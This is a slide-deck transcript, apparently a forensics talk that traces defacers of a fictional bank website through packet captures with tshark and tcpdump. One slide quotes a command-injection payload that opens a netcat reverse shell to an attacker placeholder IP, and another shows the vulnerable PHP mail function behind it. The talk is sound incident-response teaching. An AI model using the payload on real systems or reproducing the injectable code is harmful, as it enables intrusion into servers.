breaking the bank tracing defacers through a company
play

Breaking the bank Tracing defacers through a company network Judith - PowerPoint PPT Presentation

Dec 01, 2022 •377 likes •782 views

Breaking the bank Tracing defacers through a company network Judith van Stegeren After my graduation After my graduation Where I work Where I work What I do Demo Incident Response for fictional bank Zone-H: defacement registry Defacement

  1. Breaking the bank Tracing defacers through a company network Judith van Stegeren

  2. After my graduation

  3. After my graduation

  4. Where I work

  5. Where I work

  6. What I do

  7. Demo

  8. Incident Response for fictional bank

  9. Zone-H: defacement registry

  10. Defacement

  11. Snort $ ls 2015-07-19 2015-07-20 2015-07-21 2015-07-22 2015-07-23 2015-07-24 $ cd 2015-07-23 $ ls snort.log.1437609637 snort.log.1437656593 snort.log.1437692410

  12. Finding the right log $ ls snort.log.1437609637 snort.log.1437656593 snort.log.1437692410 $ capinfos -a * File name: snort.log.1437609637 First packet time: 2015-07-23 02:11:16.403393 File name: snort.log.1437656593 First packet time: 2015-07-23 15:03:13.956770 File name: snort.log.1437692410 First packet time: 2015-07-24 01:00:10.028476

  13. Wireshark!

  14. Wireshark!

  15. Wireshark!

  16. User Agent “In computing, a user agent is software (a software agent) that is acting on behalf of a user.” (Wikipedia) Examples: "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "Hetzner System Monitoring" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:40.0) Gecko/20100101 Firefox/40.0" "Tiny Tiny RSS/16.8 (3d5d289) (http://tt-rss.org/)" "Tiny Tiny RSS/17.1 (78fee22) (http://tt-rss.org/)" "Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)"

  17. Obtaining a list of User Agents with tshark $ tshark -Y "ip.src == 82.145.37.203 and http.request" -r snort.log.1437656593 -T fields -e http.user_agent | sort | uniq -c | sort -nr | head

  18. Obtaining a list of User Agents with tshark $ tshark -Y "ip.src == 82.145.37.203 and http.request" -r snort.log.1437656593 -T fields -e http.user_agent | sort | uniq -c | sort -nr | head 452 w3af.org 415 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:map_codes) 290 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:sitezip) 79 Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0 42 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:cgi dir check) 32 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:multiple_index) 32 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:embedded detection) 12 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:headers: Translate-f #1) 12 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:001398) 12 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:001397)

  19. Obtaining a list of requests with tshark $ tshark -Y "ip.src == 82.145.37.203 and http.request and http.user_agent contains Firefox" -r snort.log.1437656593 -T fields -e http.request.method -e http.host -e http.request.uri | sort | uniq -c | sort -nr

  20. Obtaining a list of requests with tshark $ tshark -Y "ip.src == 82.145.37.203 and http.request and http.user_agent contains Firefox" -r snort.log.1437656593 -T fields -e http.request.method -e http.host -e http.request.uri | sort | uniq -c | sort -nr 9 GET www.mcduckbank.net / 8 GET www.mcduckbank.net /data/media/portfolio/mcduck_on_money.jpg 5 GET www.mcduckbank.net /admin.php?mgr=login&js=1 4 POST www.mcduckbank.net /index.php?pid=4 4 GET www.mcduckbank.net /ui/elements/css/elements.css 4 GET www.mcduckbank.net /ui/admin/js/scripts.js 4 GET www.mcduckbank.net /ui/admin/js/jquery.js 4 GET www.mcduckbank.net /ui/admin/js/imagehover.js 4 GET www.mcduckbank.net /ui/admin/images/bg.clouds.mgr.png 4 GET www.mcduckbank.net /ui/admin/css/tabs.css 4 GET www.mcduckbank.net /ui/admin/css/ssm.type.css 4 GET www.mcduckbank.net /ui/admin/css/ssm.tables.css 4 GET www.mcduckbank.net /ui/admin/css/ssm.master.css 4 GET www.mcduckbank.net /index.php?pid=4 3 POST www.mcduckbank.net /admin.php?mgr=login&js=1&try=1 2 GET www.mcduckbank.net /ui/elements/images/icon.error.gif 2 GET www.mcduckbank.net /favicon.ico 2 GET www.mcduckbank.net /admin.php?en_log_id=0&action=users 2 GET www.mcduckbank.net /admin.php 1 GET www.mcduckbank.net /ui/admin/images/bg.login.png 1 GET www.mcduckbank.net /bb.jpg

  21. Intermezzo: dealing with unwieldy PCAP files

  22. Intermezzo: dealing with unwieldy PCAP files $ ls -lsh -rw-r--r-- 1 judith judith 154M Jul 23 2015 snort.log.1437609637 -rw-r--r-- 1 judith judith 155M Jul 24 2015 snort.log.1437656593 -rw-r--r-- 1 judith judith 264K Jul 24 2015 snort.log.1437692410

  23. Intermezzo: dealing with unwieldy PCAP files Let’s filter on attacker IP $ tcpdump -r snort.log.1437656593 -w attacker.pcap host 82.145.37.203

  24. Intermezzo: dealing with unwieldy PCAP files Let’s filter on attacker IP $ tcpdump -r snort.log.1437656593 -w attacker.pcap host 82.145.37.203 And then filter out only packages from after 17:00 $ editcap -A "2015-07-23 17:00:00" -F pcap attacker.pcap attacker_after_17.pcap

  25. Intermezzo: dealing with unwieldy PCAP files $ ls -lsh total 320M 440K -rw-r--r-- 1 judith judith 439K Apr 11 16:21 attacker_after_17.pcap 10M -rw-r--r-- 1 judith judith 10M Apr 11 16:14 attacker.pcap 154M -rw-r--r-- 1 judith judith 154M Jul 23 2015 snort.log.1437609637 155M -rw-r--r-- 1 judith judith 155M Jul 24 2015 snort.log.1437656593 264K -rw-r--r-- 1 judith judith 264K Jul 24 2015 snort.log.1437692410

  26. Small PCAP

  27. Attack 1

  28. Attack 2

  29. Contactform

  30. Underlying PHP code function bashMail($sbj, $msg, $to, $cc=’’, $bc=’’) { $cmd = ’echo "’.$msg.’" | mail -s "’.$sbj.’" ’.$to; exec($cmd, $err); $res = count($err) == 0 ? 1 : 4 ; return $res; }

  31. Underlying PHP code function bashMail($sbj, $msg, $to, $cc=’’, $bc=’’) { $cmd = ’echo "’.$msg.’" | mail -s "’.$sbj.’" ’.$to; exec($cmd, $err); $res = count($err) == 0 ? 1 : 4 ; return $res; } CVE-2014-1683 “It is possible to exploit this vulnerability because the POST parameters name , email , subject , and message are not properly sanitized when submitted to the contactform page. Arbitrary commands can be executed by injecting the payload to a vulnerable parameter.” source: http://seclists.org/fulldisclosure/2014/Jan/159

  32. Command injection results Input sent by attacker: escape"; /bin/nc.traditional -e /bin/sh [attacker ip] 37226; echo " Resulting PHP code: exec(’echo "escape"; /bin/nc.traditional -e /bin/sh [attacker ip] 37226; echo "" | mail -s "’.$sbj.’" ’.$to, $err);

  33. Customer data

  34. Attacker shell

  35. Attacker shell

  36. Summary 1. Automated website scans W3G/Nikto 2. Manual attacks via Firefox/IceWeasel 3. Brute-force attacks on administrator panel 4. Command injection attack via contact form 5. Upload new index and image via netcat Credits PCAP and defacement scenario by Erik Hjelmvik, NETRESEC (SE)

  37. Asymmetric relation attack vs defense

  38. Further reading Career advice ◮ www.cyberdomein.nl , “Carriere” ◮ www.jvns.ca , “How to be a wizard programmer” and all other comics by Julia Evans Practice your infosec skills ◮ www.certifiedsecure.com , online challenges, mostly web-security. ◮ www.microcorruption.com , assembly-focused (virtual) hardware hacking ◮ www.cryptopals.com , learn to implement and break crypto ◮ www.crimediggers.nl , digital forensics challenge by the Dutch police

  39. Questions?

Recommend

Advanced Ray Tracing 1 2/8/2006 Distributed Ray Tracing Distributed ray tracing is an

Advanced Ray Tracing 1 2/8/2006 Distributed Ray Tracing Distributed ray tracing is an

Advanced Ray Tracing 1 2/8/2006 Distributed Ray Tracing Distributed ray tracing is an elegant technique that tackles many problems at once Stochastic ray tracing: distribute rays stochastically across pixel Distributed ray tracing:

327 views • 8 slides
MIT 6.837 - Ray Tracing Ray Tracing MIT EECS 6.837 Most slides are taken from Frdo Durand and

MIT 6.837 - Ray Tracing Ray Tracing MIT EECS 6.837 Most slides are taken from Frdo Durand and

MIT 6.837 - Ray Tracing Ray Tracing MIT EECS 6.837 Most slides are taken from Frdo Durand and Barb Cutler Some slides courtesy of Leonard McMillan 1 2 Ray Tracing Ray Tracing Ray Tracing kills two birds with one stone: Solves the

327 views • 11 slides
BU BUILD YOUR R OWN PR DISTRIBUTION MACHINE WI WITHOUT BR BREAKING THE BA BANK usfarmdata.com

BU BUILD YOUR R OWN PR DISTRIBUTION MACHINE WI WITHOUT BR BREAKING THE BA BANK usfarmdata.com

BU BUILD YOUR R OWN PR DISTRIBUTION MACHINE WI WITHOUT BR BREAKING THE BA BANK usfarmdata.com | 2 Million database of US Farmers & Ranchers TODAY Goal: Get in Front of our Audience Types of press releases Targeting distribution

511 views • 21 slides
Become a Progressive No Kill Community without Breaking the Bank Presented by:

Become a Progressive No Kill Community without Breaking the Bank Presented by:

Become a Progressive No Kill Community without Breaking the Bank Presented by: Hillsborough County Pet Resources & The Humane Society of Tampa Bay Sponsored by: Best Friends Animal Society, Inc. Paradigm Shift in Public Sheltering

454 views • 16 slides
Ray Tracing 1 Ray Tracing Ray Tracing kills two birds with one stone: Solves the Hidden

Ray Tracing 1 Ray Tracing Ray Tracing kills two birds with one stone: Solves the Hidden

Ray Tracing 1 Ray Tracing Ray Tracing kills two birds with one stone: Solves the Hidden Surface Removal problem Evaluates an improved global illumination model shadows ideal specular reflections ideal specular refractions

586 views • 19 slides
Introduction to Path Tracing Marc Sunet Table of contents From Ray Tracing to Path Tracing The

Introduction to Path Tracing Marc Sunet Table of contents From Ray Tracing to Path Tracing The

Introduction to Path Tracing Marc Sunet Table of contents From Ray Tracing to Path Tracing The Rendering Equation Monte Carlo Integration A Basic Path Tracer Variance Reduction and Optimisation Techniques Additional Resources Plan From Ray

1.08k views • 54 slides
Computer Graphics - Ray-Tracing II - Hendrik Lensch Computer Graphics WS07/08 Ray Tracing II

Computer Graphics - Ray-Tracing II - Hendrik Lensch Computer Graphics WS07/08 Ray Tracing II

Computer Graphics - Ray-Tracing II - Hendrik Lensch Computer Graphics WS07/08 Ray Tracing II Overview Last lecture Ray tracing I Basic ray tracing What is possible? Recursive ray tracing algorithm Intersection

873 views • 84 slides
Ray-tracing Acceleration Motivation Distribution Ray Tracing Soft shadows

Ray-tracing Acceleration Motivation Distribution Ray Tracing Soft shadows

Ray-tracing Acceleration Motivation Distribution Ray Tracing Soft shadows Acceleration Data Structures Antialiasing (getting rid of jaggies) for Ray Tracing Glossy reflection Motion blur Depth of field (focus)

940 views • 10 slides
Welcome 1 Ray tracing part I of the course 2 Ray tracing part I of the course Why

Welcome 1 Ray tracing part I of the course 2 Ray tracing part I of the course Why

Graphics (INFOGR), 2018-19, Block IV, lecture 1 Deb Panja Today: Vectors and vector algebra Welcome 1 Ray tracing part I of the course 2 Ray tracing part I of the course Why vectors? you need to shoot a lot of such rays!

594 views • 47 slides
Pros and Cons of Bank Holding Companies: Determining Whether a Bank Holding Company Structure

Pros and Cons of Bank Holding Companies: Determining Whether a Bank Holding Company Structure

Presenting a live 90-minute webinar with interactive Q&A Pros and Cons of Bank Holding Companies: Determining Whether a Bank Holding Company Structure Makes Sense for Your Bank THURSDAY, OCTOBER 12, 2017 1pm Eastern | 12pm Central |

667 views • 55 slides
Ray Tracing Basics CSE 681 Autumn 11 Han-Wei Shen Forward Ray Tracing We shoot a large

Ray Tracing Basics CSE 681 Autumn 11 Han-Wei Shen Forward Ray Tracing We shoot a large

Ray Tracing Basics CSE 681 Autumn 11 Han-Wei Shen Forward Ray Tracing We shoot a large number of photons Problem? Backward Tracing For every pixel Construct a ray from the eye For every object in the scene Find intersection with the ray

695 views • 55 slides
July 1, 2009 Company Name: Aozora Bank, Ltd. (Code: 8304, TSE First Section) Company Name:

July 1, 2009 Company Name: Aozora Bank, Ltd. (Code: 8304, TSE First Section) Company Name:

July 1, 2009 Company Name: Aozora Bank, Ltd. (Code: 8304, TSE First Section) Company Name: Shinsei Bank, Limited (Code: 8303, TSE First Section) Aozora Bank, Ltd. and Shinsei Bank, Limited Announce Agreement to Merge - Creation of a Japanese

158 views • 12 slides
Knowledge Tracing Machines: Factorization Machines for Knowledge Tracing Jill-Jnn Vie Hisashi

Knowledge Tracing Machines: Factorization Machines for Knowledge Tracing Jill-Jnn Vie Hisashi

Introduction Knowledge Tracing Encoding existing models Knowledge Tracing Machines Results Conclusion Knowledge Tracing Machines: Factorization Machines for Knowledge Tracing Jill-Jnn Vie Hisashi Kashima KJMLW, February 22, 2019

698 views • 51 slides
2002 State Member Bank / Bank Holding Company Regulatory Reporting Update Meredith Miske Rich

2002 State Member Bank / Bank Holding Company Regulatory Reporting Update Meredith Miske Rich

2002 State Member Bank / Bank Holding Company Regulatory Reporting Update Meredith Miske Rich Molloy Monica Posen Mike Tursi Federal Reserve Bank of New York April 1, 2002 1 2002 State Member Bank / Bank Holding Company Regulatory

1.03k views • 102 slides
Breaking New Ground Bank of America Global Metals, Mining and Steel Conference May 2020

Breaking New Ground Bank of America Global Metals, Mining and Steel Conference May 2020

Breaking New Ground Bank of America Global Metals, Mining and Steel Conference May 2020 Klada , Turkey Forward Looking Statement Non-IFRS Measures Certain non-IFRS measures are included in this presentation, including average realized

178 views • 14 slides
Breaking out of the box Understanding rela5onships between learning and assessment Breaking

Breaking out of the box Understanding rela5onships between learning and assessment Breaking

Dr Nick Saville Breaking out of the box Understanding rela5onships between learning and assessment Breaking out of the box - a metaphor for thinking about rela5onships and interpreta5ons breaking out breaking out of the box of the

895 views • 68 slides
Advanced Ray Tracing Stochastic ray tracing: distribute rays stochastically across pixel

Advanced Ray Tracing Stochastic ray tracing: distribute rays stochastically across pixel

Distributed Ray Tracing Distributed ray tracing is an elegant technique that tackles many problems at once Advanced Ray Tracing Stochastic ray tracing: distribute rays stochastically across pixel Distributed ray tracing: distribute

263 views • 3 slides
Computer Graphics - Ray Tracing I - Hendrik Lensch Computer Graphics WS07/08 Ray Tracing I

Computer Graphics - Ray Tracing I - Hendrik Lensch Computer Graphics WS07/08 Ray Tracing I

Computer Graphics - Ray Tracing I - Hendrik Lensch Computer Graphics WS07/08 Ray Tracing I Overview Last Lecture Introduction Now Ray tracing I Background Basic ray tracing What is possible? Recursive

1.09k views • 56 slides
Relativistic Ray Tracing in Julia Ryan McKinnon November 30, 2015 Introduction Ray tracing is

Relativistic Ray Tracing in Julia Ryan McKinnon November 30, 2015 Introduction Ray tracing is

Relativistic Ray Tracing in Julia Ryan McKinnon November 30, 2015 Introduction Ray tracing is used in many scientific fields to visualize 3D data Relativistic ray tracing is needed to model a black holes warped spacetime under general

332 views • 9 slides
Ray Tracing MIT EECS 6.837 Most slides are taken from Frdo Durand and Barb Cutler Some slides

Ray Tracing MIT EECS 6.837 Most slides are taken from Frdo Durand and Barb Cutler Some slides

Ray Tracing MIT EECS 6.837 Most slides are taken from Frdo Durand and Barb Cutler Some slides courtesy of Leonard McMillan 1 2 3 4 Ray Tracing Ray Tracing Ray Tracing kills two birds with one stone: Solves the Hidden Surface

345 views • 10 slides
Logistics Paper summaries on Ray Tracing Any takers? Advanced Ray Tracing About the

Logistics Paper summaries on Ray Tracing Any takers? Advanced Ray Tracing About the

Logistics Paper summaries on Ray Tracing Any takers? Advanced Ray Tracing About the Animation Course Announcement 12-hour programming competition Tenatively scheduled for: Sponsored by Computer Science House & Redbull

491 views • 11 slides
Ray tracing Computer Graphics 2006 Based on slides by: Santa Clara University Ray Tracing

Ray tracing Computer Graphics 2006 Based on slides by: Santa Clara University Ray Tracing

Ray tracing Computer Graphics 2006 Based on slides by: Santa Clara University Ray Tracing What is it? Why use it? Basics Advanced topics References Ray-Tracing: Why Use It? Simulate rays of light Produces natural

705 views • 59 slides
Annual State Member Bank/ Bank Holding Company Presentation 2005 Federal Reserve Bank of New

Annual State Member Bank/ Bank Holding Company Presentation 2005 Federal Reserve Bank of New

Annual State Member Bank/ Bank Holding Company Presentation 2005 Federal Reserve Bank of New York March 22, 2005 1 Overview of Proposed Changes to FFIEC 009 series Alex Santana Statistics Function March 22, 2005 2 1 Overview

574 views • 32 slides
Idea/Opportunity Product/Service Company Tracing the Trajectory of the StartUp Roller

Idea/Opportunity Product/Service Company Tracing the Trajectory of the StartUp Roller

Idea/Opportunity Product/Service Company Tracing the Trajectory of the StartUp Roller Coaster! ENT203 Part I: Oct 3, 2016 The Journey Part II: Oct 6, 2016 Challenges & Learnings Dr Ram Ramdas, Founder & CEO - Herald

624 views • 30 slides

More recommend